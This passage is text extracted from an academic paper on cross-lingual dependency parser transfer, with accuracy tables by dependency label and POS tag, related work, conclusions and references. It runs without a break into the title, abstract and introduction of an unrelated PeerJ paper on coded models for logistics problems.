serve very low accuracies in supervised parsing for some languages in which the number of training sen- tences is very low (for example, Latin has only 1326 projective trees in the training data). 5 Analysis We conclude with some analysis of the accuracy of the method on different dependency types, across the different languages. Table 10 shows precision and recall on different dependency types in English (using the Google treebank). The improvements in accuracy when moving from the delexicalized model to the Bible or Europarl model apply quite uniformly across all dependency types, with all de- pendency labels showing an improvement. Table 11 shows the dependency accuracy sorted by part-of-speech tag of the modifier in the depen- dency. We break the results into three groups: G1 languages, where UAS is at least 80% overall; G2 languages, where UAS is between 70% and 80%; and G3 languages, where UAS is less than 70%. There are some quite significant differences in ac- curacy depending on the POS of the modifier word. In the G1 languages, for example, ADP, DET, ADJ, PRON and AUX all have over 85% accuracy; in con- trast NOUN, VERB, PROPN, ADV all have accu- racy that is less than 80%. A very similar pattern is seen for the G2 languages, with ADP, DET, ADJ, and AUX again having greater than 85% accuracy, but NOUN, VERB, PROPN and ADV having lower accuracies. These results suggest that difficulty varies quite significantly depending on the modifier POS, and different languages show the same pat- terns of difficulty with respect to the modifier POS. Table 12 shows accuracy sorted by the POS tag of the head word of the dependency. By far the most frequent head POS tags are NOUN, VERB, and PROPN (accounting for 85% of all dependen- cies). The table also shows that for all language groups G1, G2, and G3, the f1 scores for NOUN, VERB and PROPN are generally higher than the f1 scores for other head POS tags. Finally, Table 13 shows precision and recall for different dependency labels for the G1, G2 and G3 languages. We again see quite large differences in accuracy between different dependency labels. The G1 language dependencies, with the most frequent label nmod, has an F-score of 75.2. In contrast, the second most frequent label, case, has 93.7 F-score. Other frequent labels with low accuracy in the G1 languages are advmod, conj, and cc. 6 Related Work There has recently been a great deal of work on syntactic transfer. A number of methods (Zeman and Resnik, 2008; McDonald et al., 2011; Cohen et al., 2011; Naseem et al., 2012; Täckström et al., 2013; Rosa and Zabokrtsky, 2015) directly learn delexicalized models that can be trained on universal treebank data from one or more source languages, then applied to the target language. More recent work has introduced cross-lingual representations— for example cross-lingual word-embeddings—that can be used to improve performance (Zhang and Barzilay, 2015; Guo et al., 2015; Duong et al., 2015a; Duong et al., 2015b; Guo et al., 2016; Am- mar et al., 2016b). These cross-lingual represen- tations are usually learned from parallel translation data. We show results of several methods (Zhang and Barzilay, 2015; Guo et al., 2016; Ammar et al., 2016b) in Table 7 of this paper. The annotation projection approach, where de- pendencies from one language are transferred through translation alignments to another language, has been considered by several authors (Hwa et al., 2005; Ganchev et al., 2009; McDonald et al., 2011; Ma and Xia, 2014; Rasooli and Collins, 2015; 287 dependency freq Delexicalized Bible Europarl prec./rec. f1 prec./rec. f1 prec./rec. f1 adpmod 10.6 57.2/62.7 59.8 67.1/71.8 69.4 70.3/73.8 72.0 adpobj 10.6 65.5/69.1 67.2 75.3/77.4 76.3 75.9/79.2 77.6 det 9.5 72.5/75.6 74.0 84.3/86.3 85.3 86.6/89.8 88.2 compmod 9.1 83.7/ 59.9 69.8 87.3/70.2 77.8 89.0/73.0 80.2 nsubj 8.0 69.7/60.0 64.5 82.1/77.5 79.7 83.0/78.1 80.5 amod 7.0 76.9/72.3 74.5 83.0/78.7 80.8 80.9/77.9 79.4 ROOT 4.8 69.3/70.4 69.8 85.0/85.1 85.0 83.8/85.8 84.8 num 4.6 67.8/55.3 60.9 70.7/55.2 62.0 75.0/63.0 68.5 dobj 4.5 60.8/80.3 69.2 64.0/84.9 73.0 68.4/86.6 76.5 advmod 4.1 65.9/61.9 63.8 72.7/68.1 70.3 69.6/68.8 69.2 aux 3.5 76.6/93.9 84.4 90.2/95.9 93.0 89.6/96.4 92.9 cc 2.9 67.6/61.7 64.5 73.1/73.1 73.1 73.1/73.3 73.2 conj 2.8 46.3/56.1 50.7 45.6/62.9 52.9 48.1/62.8 54.5 dep 2.0 90.5/25.8 40.1 99.2/33.8 50.4 92.0/34.4 50.1 poss 2.0 72.1/30.6 43.0 77.9/45.8 57.7 78.2/42.1 54.7 ccomp 1.6 76.2/28.4 41.3 88.0/61.3 72.3 82.3/69.1 75.1 adp 1.2 20.0/0.5 0.9 92.7/42.1 57.9 91.7/23.3 37.1 nmod 1.2 60.7/48.1 53.7 56.3/47.1 51.3 52.6/46.2 49.2 xcomp 1.2 66.6/48.6 56.2 85.1/65.3 73.9 78.3/71.0 74.5 mark 1.1 37.8/24.6 29.8 73.8/50.3 59.8 62.8/53.8 57.9 advcl 0.8 23.6/22.3 22.9 38.7/38.8 38.8 38.0/42.9 40.3 appos 0.8 8.5/43.0 14.3 20.4/61.0 30.6 26.4/61.7 37.0 auxpass 0.8 88.9/91.4 90.1 96.8/97.1 97.0 98.6/98.6 98.6 rcmod 0.8 38.2/33.3 35.6 46.8/54.6 50.4 52.7/55.0 53.8 nsubjpass 0.7 73.2/64.9 68.8 87.6/77.0 82.0 85.5/75.8 80.3 acomp 0.6 86.8/92.5 89.6 83.3/93.5 88.1 91.0/93.9 92.4 adpcomp 0.6 42.0/70.2 52.5 47.9/61.5 53.9 55.4/47.1 50.9 partmod 0.6 20.2/36.0 25.8 36.7/49.1 42.0 31.0/40.7 35.2 attr 0.5 67.7/86.4 75.9 76.5/92.1 83.6 72.6/92.7 81.4 neg 0.5 74.7/85.0 79.6 93.3/91.0 92.1 92.6/89.8 91.2 prt 0.3 27.4/92.2 42.2 32.4/96.6 48.5 31.9/97.4 48.1 infmod 0.2 30.7/72.4 43.2 38.4/64.4 48.1 42.6/63.2 50.9 expl 0.1 84.8/87.5 86.2 93.8/93.8 93.8 91.2/96.9 93.9 iobj 0.1 51.7/78.9 62.5 88.9/84.2 86.5 36.4/84.2 50.8 mwe 0.1 0.0/0.0 0.0 5.3/2.1 3.0 11.1/10.4 10.8 parataxis 0.1 5.6/19.6 8.7 17.3/47.1 25.3 14.6/45.1 22.0 cop 0.0 0.0/0.0 0.0 0.0/0.0 0.0 0.0/0.0 0.0 csubj 0.0 12.8/33.3 18.5 22.2/26.7 24.2 25.0/46.7 32.6 csubjpass 0.0 100.0/100.0 100.0 100.0/100.0 100.0 50.0/100.0 66.7 rel 0.0 100.0/6.3 11.8 90.9/62.5 74.1 66.7/37.5 48.0 Table 10: Precision, recall and f-score of different depen- dency relations on the English development data of the Google universal treebank. The major columns show the dependency labels (“dep.”), frequency (“freq.”), the base- line delexicalized model (“delex”), and our method using the Bible and Europarl (“EU”) as translation data. The rows are sorted by frequency. Lacroix et al., 2016; Agić et al., 2016; Schlichtkrull and Søgaard, 2017). Other recent work (Tiedemann et al., 2014; Tiede- mann, 2015; Tiedemann and Agić, 2016) has con- sidered treebank translation, where a statistical ma- chine translation system (e.g., MOSES (Koehn et al., 2007)) is used to translate a source language treebank into the target language, complete with re- ordering of the input sentence. The lexicalization POS G1 G2 G3 freq% acc. freq% acc. freq% acc. NOUN 22.0 77.6 30.0 71.2 25.3 58.0 ADP 16.9 92.3 10.9 92.3 11.2 90.6 DET 11.9 96.4 3.0 92.4 3.6 86.6 VERB 11.7 74.5 13.5 66.1 17.1 52.2 PROPN 8.1 79.0 4.7 65.2 6.8 49.5 ADJ 8.0 88.5 12.7 86.9 8.4 73.6 PRON 5.4 87.7 5.9 82.2 7.6 71.1 ADV 4.3 76.0 6.6 70.9 5.6 61.9 CONJ 3.6 71.8 4.7 63.0 4.2 60.4 AUX 2.7 91.5 1.7 88.9 3.0 70.6 NUM 2.2 79.5 2.3 68.4 2.0 75.7 SCONJ 1.8 80.5 1.9 77.2 2.6 65.0 PART 0.9 80.2 1.8 64.3 1.9 45.0 X 0.2 52.3 0.1 40.5 0.6 36.9 SYM 0.1 64.3 0.1 40.9 0.1 45.5 INTJ 0.1 78.5 0.0 51.7 0.3 60.2 Table 11: Accuracy of unlabeled dependencies by POS of the modifier word, for three groups of languages for the universal dependencies experiments in Table 9: G1 (languages with UAS ≥ 80), G2 (languages with 70 ≤ UAS < 80), G3 (languages with UAS < 70). The rows are sorted by frequency in the G1 languages. approach described in this paper is a simple form of treebank translation, where we use a word-to-word translation model. In spite of its simplicity, it is an effective approach. A number of authors have considered incorporat- ing universal syntactic properties, such as depen- dency order, by selectively learning syntactic at- tributes from similar source languages (Naseem et al., 2012; Täckström et al., 2013; Zhang and Barzi- lay, 2015; Ammar et al., 2016a). Selective shar- ing of syntactic properties is complementary to our work. We used a very limited form of selective shar- ing, through the WALS properties, in our baseline approach. More recently, Wang and Eisner (2016) have developed a synthetic treebank as a universal treebank to help learn parsers for new languages. Martı́nez Alonso et al. (2017) try a very different approach in cross-lingual transfer by using a rank- ing approach. A number of authors (Täckström et al., 2012; Guo et al., 2015; Guo et al., 2016) have introduced methods that learn cross-lingual representations that are then used in syntactic transfer. Most of these approaches introduce constraints to a clustering or embedding algorithm that encourage words that are translations of each other to have similar represen- tations. Our method of deriving a cross-lingual cor- 288 POS G1 G2 G3 freq% prec. rec. f1 freq% prec. rec. f1 freq% prec. rec. f1 NOUN 43.9 85.4 88.6 87.0 43.5 77.3 81.2 79.2 34.5 67.1 71.0 69.0 VERB 32.0 83.5 83.6 83.6 35.4 74.9 77.9 76.4 41.3 63.8 66.5 65.1 PROPN 9.1 84.0 84.0 84.0 4.1 67.6 63.2 65.3 6.4 57.2 54.8 56.0 ADJ 4.5 76.2 72.4 74.3 5.7 75.7 56.0 64.4 5.8 64.9 49.1 55.9 PRON 1.4 79.3 68.3 73.4 1.4 81.5 61.4 70.0 2.2 65.2 49.1 56.0 NUM 1.2 77.2 72.4 74.7 1.0 52.0 41.8 46.3 0.7 62.5 54.7 58.3 ADV 1.0 54.0 39.0 45.3 1.5 56.5 27.2 36.7 1.2 44.1 25.8 32.6 ADP 0.6 39.8 6.5 11.2 0.3 25.0 0.9 1.7 0.3 40.5 8.3 13.8 SYM 0.3 79.0 81.1 80.1 0.1 41.5 66.3 51.0 0.1 55.3 52.2 53.7 DET 0.3 36.3 22.6 27.8 0.1 60.6 30.6 40.7 0.1 67.6 25.3 36.8 AUX 0.2 35.7 3.7 6.6 0.0 17.2 6.7 9.6 0.8 33.3 2.2 4.2 X 0.1 52.4 52.2 52.3 0.1 42.5 41.6 42.1 0.4 39.7 42.7 41.1 SCONJ 0.1 36.8 10.0 15.7 0.1 45.7 5.8 10.3 0.1 30.0 13.5 18.7 PART 0.1 26.7 3.0 5.4 0.1 15.9 4.3 6.8 0.1 26.7 36.8 30.9 CONJ 0.1 47.8 6.5 11.4 0.1 3.3 0.9 1.4 0.1 51.7 10.2 17.0 INTJ 0.0 52.4 47.8 50.0 0.0 20.0 7.1 10.5 0.1 44.2 43.0 43.6 Table 12: Precision, recall and f-score of unlabeled dependency attachment for different POS tags as head for three groups of languages for the universal dependencies experiments in Table 9: G1 (languages with UAS ≥ 80), G2 (languages with 70 ≤ UAS < 80), G3 (languages with UAS < 70). The rows are sorted by frequency in the G1 languages. pus (see Figure 1) is closely related to Duong et al. (2015a); Gouws and Søgaard (2015); and Wick et al. (2015). Our work has made use of dictionaries that are automatically extracted from bilingual corpora. An alternative approach would be to use hand-crafted translation lexicons, for example, PanLex (Bald- win et al., 2010) (e.g. see Duong et al. (2015b)), which covers 1253 language varieties, Google trans- late (e.g., see Ammar et al. (2016c)), or Wiktionary (e.g., see Durrett et al. (2012) for an approach that uses Wiktionary for cross-lingual transfer). These resources are potentially very rich sources of in- formation. Future work should investigate whether they can give improvements in performance. 7 Conclusions We have described a method for cross-lingual syn- tactic transfer that is effective in a scenario where a large amount of translation data is not available. We have introduced a simple, direct method for deriving cross-lingual clusters, and for transferring lexical in- formation across treebanks for different languages. Experiments with this method show that the method gives improved performance over previous work that makes use of Europarl, a much larger translation cor- pus. Acknowledgement We thank the anonymous reviewers for their valu- able feedback. We also thank Ryan McDonald, Karl Stratos and Oscar Täckström for their comments on the first draft. Appendix A Parsing Features We used all features in Zhang and Nivre (2011, Ta- ble 1 and 2), which describes features based on the word and part-of-speech at various positions on the stack and buffer of the transition system. In addi- tion, we expand the Zhang and Nivre (2011, Table 1) features to include clusters, as follows: whenever a feature tests the part-of-speech for a word in po- sition 0 of the stack or buffer, we introduce features that replace the part-of-speech with the Brown clus- tering bit-string of length 4 and 6. Whenever a fea- ture tests for the word identity at position 0 of the stack or buffer, we introduce a cluster feature that replaces the word with the full cluster feature. We take the cross product of all features corresponding to the choice of 4 or 6 length bit string for part-of- speech features. References Željko Agić, Anders Johannsen, Barbara Plank, Héctor Alonso Martı́nez, Natalie Schluter, and An- ders Søgaard. 2016. Multilingual projection for 289 Dep. G1 G2 G3 freq% prec. rec. f1 freq% prec. rec. f1 freq% prec. rec. f1 nmod 15.8 74.0 76.3 75.2 16.4 67.3 72.2 69.7 17.3 56.9 57.6 57.3 case 15.3 92.6 94.7 93.7 10.7 92.4 93.5 93.0 10.7 90.2 90.2 90.2 det 11.8 96.5 96.4 96.4 3.5 91.8 91.9 91.9 3.8 79.1 86.4 82.6 nsubj 6.5 85.3 86.8 86.0 7.5 75.5 73.5 74.5 7.8 61.0 63.2 62.1 amod 6.4 92.9 94.0 93.5 10.8 90.1 90.9 90.5 5.3 75.7 82.9 79.1 dobj 5.3 93.0 90.8 91.9 7.1 84.3 81.8 83.0 5.7 71.9 72.6 72.3 root 5.3 84.8 85.2 85.0 6.8 77.5 77.9 77.7 7.9 64.9 65.7 65.3 advmod 4.1 73.4 72.2 72.8 7.1 68.1 69.3 68.7 5.3 54.8 58.7 56.7 conj 4.0 60.4 68.1 64.0 5.8 50.2 56.6 53.2 4.2 41.3 48.1 44.5 cc 3.4 71.2 71.2 71.2 4.5 63.5 63.3 63.4 3.9 60.6 61.6 61.1 mark 3.3 85.1 87.0 86.0 2.2 76.2 79.6 77.9 3.4 70.9 71 71 acl 2.4 65.9 61.6 63.7 1.7 49.7 51.3 50.5 2.0 32.6 28.7 30.5 aux 2.2 91.5 93.6 92.5 1.2 86.8 91.1 88.9 2.2 66.4 78.2 71.8 name 1.9 86.5 86.2 86.4 1.3 75.3 72.1 73.6 0.8 27.8 45.1 34.4 cop 1.6 73.1 74.5 73.8 1.3 67.7 52.5 59.1 2.1 50.8 51.2 51 nummod 1.4 83.8 86.0 84.9 1.6 73.9 77.6 75.7 1.4 79.2 81.7 80.5 advcl 1.3 60.1 59.8 60.0 1.3 57.4 48.8 52.7 2.0 42.6 38.1 40.2 appos 1.3 73.9 64.9 69.1 0.8 51.2 48.9 50.0 0.5 31.3 32.1 31.7 mwe 0.9 57.7 15.6 24.6 0.5 66.2 15.1 24.6 0.3 31.9 15.6 20.9 xcomp 0.8 82.9 74.6 78.6 1.2 76.2 73.4 74.8 1.0 40.7 62.9 49.5 ccomp 0.8 72.8 70.8 71.8 0.6 63.1 64.1 63.6 1.2 42.8 40.3 41.5 neg 0.7 89.5 88.1 88.8 0.7 81.2 82.1 81.6 1.1 73.6 72 72.8 iobj 0.7 98.7 91.1 94.7 0.5 96.3 71.0 81.7 1.1 97.1 67.1 79.3 expl 0.6 90.9 84.7 87.7 0.7 87.3 86.8 87.1 0.1 62.5 45 52.3 auxpass 0.5 95.7 96.5 96.1 0.7 98.3 93.5 95.8 1.2 92.3 49.8 64.7 nsubjpass 0.5 94.6 89.9 92.2 0.7 96.1 85.0 90.2 0.6 94.4 67.2 78.5 parataxis 0.4 56.0 32.4 41.1 0.9 52.2 36.8 43.2 0.4 30.4 33.2 31.7 compound 0.4 74.2 66.2 69.9 0.6 72.5 63.6 67.8 4.4 84.7 51.6 64.1 csubj 0.2 77.0 52.5 62.4 0.3 88.1 57.3 69.4 0.2 45.9 31.3 37.2 dep 0.1 70.4 52.4 60.1 0.6 91.2 38.5 54.2 0.5 17.7 16.2 16.9 discourse 0.1 75.6 58.5 66.0 0.1 53.3 60.0 56.5 0.7 77.1 48.4 59.4 foreign 0.0 62.2 69.7 65.7 0.1 98.4 60.7 75.1 0.1 30.9 19.3 23.8 goeswith 0.0 35.7 29.4 32.3 0.1 75.0 19.6 31.1 0.0 26.1 16.7 20.3 csubjpass 0.0 100.0 73.9 85.0 0.0 93.3 71.2 80.8 0.1 87.5 19.7 32.2 list 0.0 – – – 0.0 77.0 45.6 57.3 0.1 71.4 18.5 29.4 remnant 0.0 90.0 25.7 40.0 0.0 27.3 10.2 14.8 0.1 92.3 11.8 20.9 reparandum 0.0 – – – 0.0 – – – 0.1 100.0 34.6 51.4 vocative 0.0 55.6 31.3 40.0 0.0 57.4 52.9 55.1 0.1 84.5 58.6 69.2 dislocated 0.0 88.9 30.8 45.7 0.0 54.5 60.0 57.1 0.0 92.0 48.9 63.9 Table 13: Precision, recall and f-score for different dependency labels for three groups of languages for the universal dependencies experiments in Table 9: G1 (languages with UAS ≥ 80), G2 (languages with 70 ≤ UAS < 80), G3 (languages with UAS < 70). The rows are sorted by frequency in the G1 languages. parsing truly low-resource languages. Transactions of the Association for Computational Linguistics, 4:301–312. Waleed Ammar, George Mulcaire, Miguel Ballesteros, Chris Dyer, and Noah Smith. 2016a. Many languages, one parser. Transactions of the Association for Com- putational Linguistics, 4:431–444. Waleed Ammar, George Mulcaire, Miguel Ballesteros, Chris Dyer, and Noah A. Smith. 2016b. One parser, many languages. arXiv preprint arXiv:1602.01595v1. Waleed Ammar, George Mulcaire, Yulia Tsvetkov, Guil- laume Lample, Chris Dyer, and Noah A. Smith. 2016c. Massively multilingual word embeddings. arXiv preprint arXiv:1602.01925. Timothy Baldwin, Jonathan Pool, and Susan M Colow- ick. 2010. Panlex and LEXTRACT: Translating all words of all languages of the world. In Proceedings of the 23rd International Conference on Computational Linguistics: Demonstrations, pages 37–40. Associa- tion for Computational Linguistics. Peter F. Brown, Peter V. Desouza, Robert L. Mercer, Vin- cent J. Della Pietra, and Jenifer C. Lai. 1992. Class- based n-gram models of natural language. Computa- tional linguistics, 18(4):467–479. Jinho D. Choi, Joel Tetreault, and Amanda Stent. 2015. It depends: Dependency parser comparison using a web-based evaluation tool. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing of the Asian Federa- tion of Natural Language Processing, ACL, pages 26– 31. 290 Christos Christodouloupoulos and Mark Steedman. 2014. A massively parallel corpus: The Bible in 100 languages. Language Resources and Evaluation, pages 1–21. Shay B. Cohen, Dipanjan Das, and Noah A. Smith. 2011. Unsupervised structure prediction with non-parallel multilingual guidance. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing, pages 50–61, Edinburgh, Scotland, UK., July. Association for Computational Linguistics. Michael Collins. 2002. Discriminative training meth- ods for hidden Markov models: Theory and experi- ments with perceptron algorithms. In Proceedings of the 2002 Conference on Empirical Methods in Natu- ral Language Processing, pages 1–8. Association for Computational Linguistics, July. Matthew S. Dryer and Martin Haspelmath, editors. 2013. WALS Online. Max Planck Institute for Evolutionary Anthropology, Leipzig. Long Duong, Trevor Cohn, Steven Bird, and Paul Cook. 2015a. Cross-lingual transfer for unsupervised depen- dency parsing without parallel data. In Proceedings of the Nineteenth Conference on Computational Natural Language Learning, pages 113–122, Beijing, China, July. Association for Computational Linguistics. Long Duong, Trevor Cohn, Steven Bird, and Paul Cook. 2015b. A neural network model for low-resource uni- versal dependency parsing. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 339–348, Lisbon, Por- tugal, September. Association for Computational Lin- guistics. Greg Durrett, Adam Pauls, and Dan Klein. 2012. Syntac- tic transfer using a bilingual lexicon. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning, pages 1–11, Jeju Island, Korea, July. Association for Computational Linguis- tics. Kuzman Ganchev, Jennifer Gillenwater, and Ben Taskar. 2009. Dependency grammar induction via bitext pro- jection constraints. In Proceedings of the Joint Con- ference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Lan- guage Processing of the AFNLP, pages 369–377, Sun- tec, Singapore, August. Association for Computational Linguistics. Stephan Gouws and Anders Søgaard. 2015. Simple task- specific bilingual word embeddings. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Hu- man Language Technologies, pages 1386–1390, Den- ver, Colorado, May–June. Association for Computa- tional Linguistics. Jiang Guo, Wanxiang Che, David Yarowsky, Haifeng Wang, and Ting Liu. 2015. Cross-lingual dependency parsing based on distributed representations. In Pro- ceedings of the 53rd Annual Meeting of the Associa- tion for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Language Pro- cessing (Volume 1: Long Papers), pages 1234–1244, Beijing, China, July. Association for Computational Linguistics. Jiang Guo, Wanxiang Che, David Yarowsky, Haifeng Wang, and Ting Liu. 2016. A representation learning framework for multi-source transfer parsing. In The Thirtieth AAAI Conference on Artificial Intelligence (AAAI-16), Phoenix, Arizona, USA. Liang Huang, Suphan Fayong, and Yang Guo. 2012. Structured perceptron with inexact search. In Pro- ceedings of the 2012 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 142– 151, Montréal, Canada, June. Association for Compu- tational Linguistics. Rebecca Hwa, Philip Resnik, Amy Weinberg, Clara Cabezas, and Okan Kolak. 2005. Bootstrapping parsers via syntactic projection across parallel texts. Natural language engineering, 11(03):311–325. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, et al. 2007. Moses: Open source toolkit for statistical machine translation. In Proceedings of the 45th Annual Meet- ing of the ACL on Interactive Poster and Demonstra- tion Sessions, ACL ’07, pages 177–180, Stroudsburg, PA, USA. Association for Computational Linguistics. Philipp Koehn. 2005. Europarl: A parallel corpus for sta- tistical machine translation. In MT summit, volume 5, pages 79–86. Ophélie Lacroix, Lauriane Aufrant, Guillaume Wis- niewski, and François Yvon. 2016. Frustratingly easy cross-lingual transfer for transition-based dependency parsing. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 1058–1063, San Diego, California, June. Association for Computational Linguistics. Percy Liang. 2005. Semi-supervised learning for natural language. Master’s thesis, Massachusetts Institute of Technology. Xuezhe Ma and Fei Xia. 2014. Unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. In Proceed- ings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 1337–1348, Baltimore, Maryland, June. Asso- ciation for Computational Linguistics. 291 Héctor Martı́nez Alonso, Željko Agić, Barbara Plank, and Anders Søgaard. 2017. Parsing universal de- pendencies without training. In Proceedings of the 15th Conference of the European Chapter of the As- sociation for Computational Linguistics: Volume 1, Long Papers, pages 230–240. Association for Compu- tational Linguistics. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective self-training for parsing. In Pro- ceedings of the Main Conference on Human Language Technology Conference of the North American Chap- ter of the Association of Computational Linguistics, HLT-NAACL ’06, pages 152–159, Stroudsburg, PA, USA. Association for Computational Linguistics. Ryan McDonald, Slav Petrov, and Keith Hall. 2011. Multi-source transfer of delexicalized dependency parsers. In Proceedings of the 2011 Conference on Empirical Methods in Natural Language Processing, pages 62–72, Edinburgh, Scotland, UK., July. Associ- ation for Computational Linguistics. Ryan McDonald, Joakim Nivre, Yvonne Quirmbach- Brundage, Yoav Goldberg, Dipanjan Das, et al. 2013. Universal dependency annotation for multilin- gual parsing. In Proceedings of the 51st Annual Meet- ing of the Association for Computational Linguistics (Volume 2: Short Papers), pages 92–97, Sofia, Bul- garia, August. Association for Computational Linguis- tics. Tahira Naseem, Regina Barzilay, and Amir Globerson. 2012. Selective sharing for multilingual dependency parsing. In Proceedings of the 50th Annual Meet- ing of the Association for Computational Linguistics: Long Papers-Volume 1, pages 629–637. Association for Computational Linguistics. Joakim Nivre, Željko Agić, Lars Ahrenberg, Maria Jesus Aranzabe, Masayuki Asahara, et al. 2016. Universal Dependencies 1.3. LINDAT/CLARIN digital library at Institute of Formal and Applied Linguistics, Charles University in Prague. Franz Josef Och and Hermann Ney. 2003. A system- atic comparison of various statistical alignment mod- els. Computational Linguistics, 29(1):19–51. Mohammad Sadegh Rasooli and Michael Collins. 2015. Density-driven cross-lingual transfer of dependency parsers. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 328–338, Lisbon, Portugal, September. Associ- ation for Computational Linguistics. Mohammad Sadegh Rasooli and Joel Tetreault. 2015. Yara parser: A fast and accurate dependency parser. arXiv preprint arXiv:1503.06733. Rudolf Rosa and Zdenek Zabokrtsky. 2015. Klcpos3 - a language similarity measure for delexicalized parser transfer. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Linguistics and the 7th International Joint Conference on Natural Language Processing (Volume 2: Short Papers), pages 243–249, Beijing, China, July. Association for Com- putational Linguistics. Michael Schlichtkrull and Anders Søgaard. 2017. Cross- lingual dependency parsing with late decoding for truly low-resource languages. In Proceedings of the 15th Conference of the European Chapter of the As- sociation for Computational Linguistics: Volume 1, Long Papers, pages 220–229. Association for Compu- tational Linguistics. Karl Stratos, Michael Collins, and Daniel Hsu. 2015. Model-based word embeddings from decompositions of count matrices. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguis- tics and the 7th International Joint Conference on Nat- ural Language Processing (Volume 1: Long Papers), pages 1282–1291, Beijing, China, July. Association for Computational Linguistics. Oscar Täckström, Ryan McDonald, and Jakob Uszkoreit. 2012. Cross-lingual word clusters for direct transfer of linguistic structure. In Proceedings of the 2012 con- ference of the North American chapter of the associ- ation for computational linguistics: Human language technologies, pages 477–487. Association for Compu- tational Linguistics. Oscar Täckström, Ryan McDonald, and Joakim Nivre. 2013. Target language adaptation of discriminative transfer parsers. In Proceedings of the 2013 Con- ference of the North American Chapter of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 1061–1071, Atlanta, Geor- gia, June. Association for Computational Linguistics. Jörg Tiedemann and Željko Agić. 2016. Synthetic tree- banking for cross-lingual dependency parsing. Jour- nal of Artificial Intelligence Research, 55:209–248. Jörg Tiedemann, Željko Agić, and Joakim Nivre. 2014. Treebank translation for cross-lingual parser induc- tion. In Proceedings of the Eighteenth Conference on Computational Natural Language Learning, pages 130–140, Ann Arbor, Michigan, June. Association for Computational Linguistics. Jörg Tiedemann. 2015. Improving the cross-lingual pro- jection of syntactic dependencies. In Nordic Confer- ence of Computational Linguistics NODALIDA 2015, pages 191–199. Dingquan Wang and Jason Eisner. 2016. The galactic dependencies treebanks: Getting more data by synthe- sizing new languages. Transactions of the Association for Computational Linguistics, 4:491–505. Michael Wick, Pallika Kanani, and Adam Pocock. 2015. Minimally-constrained multilingual embeddings via 292 artificial code-switching. In Workshop on Transfer and Multi-Task Learning: Trends and New Perspec- tives, Montreal, Canada, December. Min Xiao and Yuhong Guo. 2015. Annotation projection-based representation learning for cross- lingual dependency parsing. In Proceedings of the Nineteenth Conference on Computational Natu- ral Language Learning, pages 73–82, Beijing, China, July. Association for Computational Linguistics. Daniel Zeman and Philip Resnik. 2008. Cross-language parser adaptation between related languages. In Pro- ceedings of the IJCNLP-08 Workshop on NLP for Less Privileged Languages, pages 35–42. Yuan Zhang and Regina Barzilay. 2015. Hierarchi- cal low-rank tensors for multilingual transfer parsing. In Proceedings of the 2015 Conference on Empiri- cal Methods in Natural Language Processing, pages 1857–1867, Lisbon, Portugal, September. Association for Computational Linguistics. Yue Zhang and Joakim Nivre. 2011. Transition-based dependency parsing with rich non-local features. In Proceedings of the 49th Annual Meeting of the Asso- ciation for Computational Linguistics: Human Lan- guage Technologies, pages 188–193, Portland, Ore- gon, USA, June. Association for Computational Lin- guistics. 293 294 work_455dmcqiznh7th3y2oqmbuw6wu ---- Development of a coded suite of models to explore relevant problems in logistics Development of a coded suite of models to explore relevant problems in logistics Santiago-Omar Caballero-Morales Postgraduate Department of Logistics and Supply Chain Management, Universidad Popular Autonóma del Estado de Puebla, Puebla, Puebla, Mexico ABSTRACT Logistics is the aspect of the supply chain which is responsible of the efficient flow and delivery of goods or services from suppliers to customers. Because a logistic system involves specialized operations such as inventory control, facility location and distribution planning, the logistic professional requires mathematical, technological and managerial skills and tools to design, adapt and improve these operations. The main research is focused on modeling and solving logistic problems through specialized tools such as integer programing and meta-heuristics methods. In practice, the use of these tools for large and complex problems requires mathematical and computational proficiency. In this context, the present work contributes with a coded suite of models to explore relevant problems by the logistic professional, undergraduate/postgraduate student and/or academic researcher. The functions of the coded suite address the following: (1) generation of test instances for routing and facility location problems with real geographical coordinates; (2) computation of Euclidean, Manhattan and geographical arc length distance metrics for routing and facility location problems; (3) simulation of non- deterministic inventory control models; (4) importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; and (5) designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for large vehicle routing and facility location problems. This work is completed by a discussion of a case study which integrates the functions of the coded suite. Subjects Algorithms and Analysis of Algorithms, Computer Education, Databases, Programming Languages Keywords Facility location, Vehicle routing, Inventory Management, Metaheuristics, Octave programming INTRODUCTION Research on supply chain (SC) management and logistics has been performed following quantitative (simulation, mathematical modeling and optimization) and qualitative (case study, interviews, empirical studies) approaches (Sachan & Datta, 2005). These approaches have been performed on the different logistic processes of the SC such as inventory control, transportation, production and distribution (Lloyd et al., 2013; Kuczyńska-Chalada, Furman & Poloczek, 2018). Transportation has been reported as the largest research topic in logistics (Daugherty, Bolumole & Schwieterman, 2017). How to cite this article Caballero-Morales S-O. 2020. Development of a coded suite of models to explore relevant problems in logistics. PeerJ Comput. Sci. 6:e329 DOI 10.7717/peerj-cs.329 Submitted 16 June 2020 Accepted 10 November 2020 Published 30 November 2020 Corresponding author Santiago-Omar Caballero-Morales, santiagoomar.caballero@upaep.mx Academic editor Jingbo Wang Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.329 Copyright 2020 Caballero-Morales Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.329 mailto:santiagoomar.�caballero@�upaep.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.329 